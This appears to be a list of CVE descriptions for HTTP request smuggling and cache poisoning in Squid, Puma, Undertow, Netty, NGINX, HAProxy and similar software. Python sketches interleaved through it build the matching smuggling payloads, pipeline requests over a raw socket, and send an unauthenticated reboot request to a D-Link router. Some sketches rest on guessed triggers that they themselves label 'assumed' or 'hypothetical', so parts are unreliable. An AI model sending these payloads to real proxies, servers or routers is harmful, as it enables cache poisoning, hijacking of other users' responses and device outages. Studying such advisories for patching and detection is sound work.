The ATS negative cache option is vulnerable to a cache poisoning attack. If you have this option enabled, please upgrade or disable this feature. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.
An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Splitting attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the browser cache and any downstream caches with content from an arbitrary source. Squid uses a string search instead of parsing the Transfer-Encoding header to find chunked encoding. This allows an attacker to hide a second request inside Transfer-Encoding: it is interpreted by Squid as chunked and split out into a second request delivered upstream. Squid will then deliver two distinct responses to the client, corrupting any downstream caches. |
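A minimal sketch of the splitting primitive this entry describes, assuming a front end that frames the message by Content-Length while Squid's substring match on "chunked" frames it as chunked. The hosts, paths, and the "xchunked" value are hypothetical; this shows only the shape of the payload, not a working exploit against any deployment.

    # Hypothetical CL.TE-style payload: a strict parser should not treat
    # "Transfer-Encoding: xchunked" as chunked, but a substring search for
    # "chunked" does, so Squid ends the body at the zero-length chunk and
    # splits the remainder out as a second request delivered upstream.
    smuggled = (
        b"GET /poisoned HTTP/1.1\r\n"
        b"Host: cache.example\r\n"   # placeholder host
        b"\r\n"
    )
    body = b"0\r\n\r\n" + smuggled   # zero-chunk terminator, then the hidden request
    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: cache.example\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: xchunked\r\n"   # matched by a substring search only
        b"\r\n"
    ) + body
    print(payload.decode())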
An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Smuggling attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the proxy cache and any downstream caches with content from an arbitrary source. When configured for relaxed header parsing (the default), Squid relays headers containing whitespace characters to upstream servers. When this occurs as a prefix to a Content-Length header, the frame length specified will be ignored by Squid (allowing for a conflicting length to be used from another Content-Length header) but relayed upstream. |
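A sketch of the header shape this entry describes, assuming the lenient parsing behavior outlined above. Hosts are placeholders, and the exact whitespace character that triggers the disagreement varies by parser.

    # Two Content-Length headers: a conforming one and a duplicate prefixed
    # with whitespace. Per the entry, Squid ignores the malformed one (so the
    # conflicting value 0 frames the message) but still relays it upstream,
    # where a lenient receiver may honor it instead.
    hidden = (
        b"GET /poisoned HTTP/1.1\r\n"
        b"Host: backend.example\r\n"   # placeholder host
        b"\r\n"
    )
    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: backend.example\r\n"
        b"Content-Length: 0\r\n"
        b" Content-Length: " + str(len(hidden)).encode() + b"\r\n"  # note the leading space
        b"\r\n"
    ) + hidden
    print(payload.decode())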
An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing a "+" or "-" sign, or an uncommon shell whitespace character, as a prefix to the length field-value.
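A sketch of the sign-prefixed field-value this entry describes; the "+" case is the illustrative one here, and the hosts are placeholders.

    # A Content-Length value carrying a "+" prefix: parsers that accept "+NN"
    # as NN and parsers that reject or ignore the header will disagree about
    # where this message ends, which is the smuggling primitive.
    trailing = (
        b"GET /poisoned HTTP/1.1\r\n"
        b"Host: cache.example\r\n"   # placeholder host
        b"\r\n"
    )
    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: cache.example\r\n"
        b"Content-Length: +" + str(len(trailing)).encode() + b"\r\n"  # sign-prefixed length
        b"\r\n"
    ) + trailing
    print(payload.decode())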
An issue was discovered in OpenResty before 1.15.8.4. ngx_http_lua_subrequest.c allows HTTP request smuggling, as demonstrated by the ngx.location.capture API. |
An issue was discovered in GitLab 10.7.0 and later through 12.9.2. A Workhorse bypass could lead to job artifact uploads and file disclosure (Exposure of Sensitive Information) via request smuggling. |
An issue was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE) before 12.7.9, 12.8.x before 12.8.9, and 12.9.x before 12.9.3. A Workhorse bypass could lead to NuGet package and file disclosure (Exposure of Sensitive Information) via request smuggling. |
In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request via HTTP pipelining, the proxy may mistake it for the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but distinct vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.
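The sketch below only illustrates the transport behavior the entry relies on, HTTP/1.1 pipelining on one persistent connection, not the Puma-specific trigger. The host, port, and paths are placeholders for a local test server.

    import socket

    HOST, PORT = "127.0.0.1", 8080  # hypothetical local test target

    # Two requests leave in a single write on one connection. An intermediary
    # that miscounts the requests it forwarded will misattribute the extra
    # response to whichever client it serves next on the reused connection.
    requests = (
        b"GET /first HTTP/1.1\r\nHost: test\r\n\r\n"
        b"GET /second HTTP/1.1\r\nHost: test\r\n\r\n"
    )

    with socket.create_connection((HOST, PORT)) as s:
        s.sendall(requests)
        s.settimeout(2)
        data = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass

    print(data.count(b"HTTP/1.1 "), "response(s) on one connection")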
In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response by using an invalid Transfer-Encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
A flaw was found in Undertow versions before 2.1.1.Final regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to carry out HTTP request smuggling.
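A sketch of the invalid chunk-size shape this entry refers to; the host is a placeholder and the oversized value is illustrative only.

    # A chunked message whose chunk-size field exceeds a signed 64-bit
    # integer. A parser that overflows, truncates, or rejects this value will
    # frame the body differently from one that handles it strictly; the data
    # here is intentionally shorter than the declared size.
    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: app.example\r\n"          # placeholder host
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"FFFFFFFFFFFFFFFF\r\n"           # declared chunk size: 2**64 - 1
        b"X\r\n"
        b"0\r\n"
        b"\r\n"
    )
    print(payload.decode())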
A flaw was discovered in all versions of Undertow before 2.2.0.Final, where HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web cache, perform an XSS attack, or obtain sensitive information from requests other than their own.
Citrix Gateway 11.1, 12.0, and 12.1 allows Cache Poisoning. NOTE: Citrix disputes this as not a vulnerability. By default, Citrix ADC only caches static content served under certain URL paths for Citrix Gateway usage. No dynamic content is served under these paths, which implies that those cached pages would not change based on parameter values. All other data traffic going through Citrix Gateway is NOT cached by default.
Citrix Gateway 11.1, 12.0, and 12.1 has an Inconsistent Interpretation of HTTP Requests. NOTE: Citrix disputes the reported behavior as not a security issue. Citrix ADC only caches HTTP/1.1 traffic for performance optimization.
An issue was discovered in Mattermost Server before 5.12.0. Use of a proxy HTTP header, rather than the source address in the IP packet header, to obtain IP address information was mishandled.
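A sketch of the spoofing shape this entry implies. The header name used here (X-Forwarded-For) is an assumed example of a proxy-supplied address header, not confirmed by the entry, and the host and path are placeholders.

    # If the server derives the client IP from a proxy header instead of the
    # TCP source address, any client can assert an arbitrary address.
    payload = (
        b"GET /api/v4/some-endpoint HTTP/1.1\r\n"   # illustrative path
        b"Host: mattermost.example\r\n"             # placeholder host
        b"X-Forwarded-For: 10.0.0.1\r\n"            # attacker-chosen address (assumed header)
        b"\r\n"
    )
    print(payload.decode())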
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. |
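Both ambiguous framings named in this entry, shown as raw messages; the hosts are placeholders, and a strict parser must reject both.

    # Framing 1: duplicate Content-Length headers with conflicting values.
    dual_content_length = (
        b"POST / HTTP/1.1\r\n"
        b"Host: app.example\r\n"       # placeholder host
        b"Content-Length: 5\r\n"
        b"Content-Length: 0\r\n"
        b"\r\n"
        b"HELLO"
    )
    # Framing 2: Content-Length alongside Transfer-Encoding; receivers that
    # prefer different headers disagree about where the message ends.
    length_plus_chunked = (
        b"POST / HTTP/1.1\r\n"
        b"Host: app.example\r\n"
        b"Content-Length: 5\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"0\r\n"
        b"\r\n"
    )
    print(dual_content_length.decode())
    print(length_plus_chunked.decode())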
NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer. |
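A sketch of the request shape behind this issue, under an assumed error_page configuration; the configuration, host, and paths below are all hypothetical placeholders, not the confirmed trigger.

    # Assumed configuration shape (hypothetical): a location answered via
    # error_page leaves unread body bytes on the connection, e.g.
    #
    #     error_page 401 http://upstream.example/;
    #     location / { return 401; }
    #
    # The declared Content-Length covers the hidden request, so the leftover
    # bytes are parsed as a new pipelined request.
    hidden = (
        b"GET /poisoned HTTP/1.1\r\n"
        b"Host: upstream.example\r\n"   # placeholder host
        b"\r\n"
    )
    payload = (
        b"GET / HTTP/1.1\r\n"
        b"Host: upstream.example\r\n"
        b"Content-Length: " + str(len(hidden)).encode() + b"\r\n"
        b"\r\n"
    ) + hidden
    print(payload.decode())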
Silverstripe CMS sites through 4.4.4 which have opted into HTTP Cache Headers on responses served by the framework's HTTP layer can be vulnerable to web cache poisoning. By modifying the X-Original-Url and X-HTTP-Method-Override headers, an attacker can cause responses with malicious HTTP headers to be cached and returned to other consumers of the cached response. Most other headers associated with web cache poisoning are already disabled through request hostname forgery whitelists.
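A sketch of a request carrying the two headers this entry names; the host and the override values are illustrative only.

    # If the cache keys on the outer request line but the framework honors
    # X-Original-Url, the cached response for a benign URL can be generated
    # from attacker-chosen routing.
    payload = (
        b"GET /benign-page HTTP/1.1\r\n"
        b"Host: site.example\r\n"              # placeholder host
        b"X-Original-Url: /other-route\r\n"    # illustrative override value
        b"X-HTTP-Method-Override: POST\r\n"    # illustrative override value
        b"\r\n"
    )
    print(payload.decode())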
A Broken Access Control vulnerability in the D-Link DSL-2680 web administration interface (Firmware EU_1.03) allows an attacker to reboot the router by submitting a reboot.html GET request without being authenticated on the admin interface. |
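A sketch of the unauthenticated request this entry describes; the router address is a placeholder, and the page name is taken from the entry itself.

    import urllib.request

    # Hypothetical illustration only: an unauthenticated GET for reboot.html,
    # which the entry says triggers a reboot without an admin session.
    ROUTER = "http://192.168.1.1"  # placeholder address for the device
    urllib.request.urlopen(ROUTER + "/reboot.html", timeout=5)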
An issue was discovered in Squid 3.x and 4.x through 4.8. It allows attackers to smuggle HTTP requests through frontend software to a Squid instance that splits the HTTP Request pipeline differently. The resulting Response messages corrupt caches (between a client and Squid) with attacker-controlled content at arbitrary URLs. Effects are isolated to software between the attacker client and Squid. There are no effects on Squid itself, nor on any upstream servers. The issue is related to a request header containing whitespace between a header name and a colon. |
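A sketch of the malformed header this entry describes; the host and the chosen header are placeholders.

    # A header name followed by whitespace before the colon. Agents that strip
    # the whitespace, reject the header, or treat the line as invalid will
    # split the request pipeline differently, per the entry above.
    payload = (
        b"GET / HTTP/1.1\r\n"
        b"Host: cache.example\r\n"      # placeholder host
        b"Content-Length : 0\r\n"       # note the space before the colon
        b"\r\n"
    )
    print(payload.decode())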
A flaw was found in HAProxy before 2.0.6. In legacy mode, messages featuring a transfer-encoding header missing the "chunked" value were not being correctly rejected. The impact was limited but if combined with the "http-reuse always" setting, it could be used to help construct an HTTP request smuggling attack against a vulnerable component employing a lenient parser that would ignore the content-length header as soon as it saw a transfer-encoding one (even if not entirely valid according to the specification). |
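A sketch of the message shape this entry describes, pairing a Transfer-Encoding header that lacks the "chunked" value with a Content-Length; the hosts are placeholders, and the lenient-backend behavior is the assumption the entry itself states.

    # HAProxy in legacy mode relayed this instead of rejecting it. An
    # intermediary framing by Content-Length sees one request; a lenient
    # backend that defers to Transfer-Encoding as soon as it sees one (even
    # without "chunked") may frame the bytes differently.
    hidden = (
        b"GET /poisoned HTTP/1.1\r\n"
        b"Host: backend.example\r\n"   # placeholder host
        b"\r\n"
    )
    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: backend.example\r\n"
        b"Transfer-Encoding: identity\r\n"   # no "chunked" value
        b"Content-Length: " + str(len(hidden)).encode() + b"\r\n"
        b"\r\n"
    ) + hidden
    print(payload.decode())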